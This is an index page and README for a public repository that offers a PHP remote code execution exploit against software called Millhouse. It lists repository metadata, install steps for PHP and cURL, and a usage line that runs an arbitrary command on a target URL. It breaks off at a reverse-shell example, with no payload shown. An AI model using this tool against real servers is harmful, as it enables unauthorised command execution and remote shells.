https://github.com/blue0x1/millhouse-rce-exploit
Millhouse Remote code execution exploit
https://github.com/blue0x1/millhouse-rce-exploit
exploits rce rce-exploit remote-code-execution
Last synced: 4 months ago
JSON representation
Millhouse Remote code execution exploit
- Host: GitHub
- URL: https://github.com/blue0x1/millhouse-rce-exploit
- Owner: blue0x1
- Created: 2023-05-12T05:33:26.000Z (about 2 years ago)
- Default Branch: main
- Last Pushed: 2023-05-12T21:30:45.000Z (about 2 years ago)
- Last Synced: 2025-01-04T15:30:23.994Z (6 months ago)
- Topics: exploits, rce, rce-exploit, remote-code-execution
- Language: PHP
- Homepage:
- Size: 3.91 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
Millhouse Remote code execution exploit
## Prerequisites
- PHP installed
- cURL extension enabled in PHP## Install requirements
```bash
sudo apt update
sudo apt install php
sudo apt install php-curl
```## Usage
```bash
php exploit.php -u http://target.org/ -c COMMAND
```
or```bash
php exploit.php -u http://target.org/ -c "COMMAND"
```
Example:
Reverse shell:
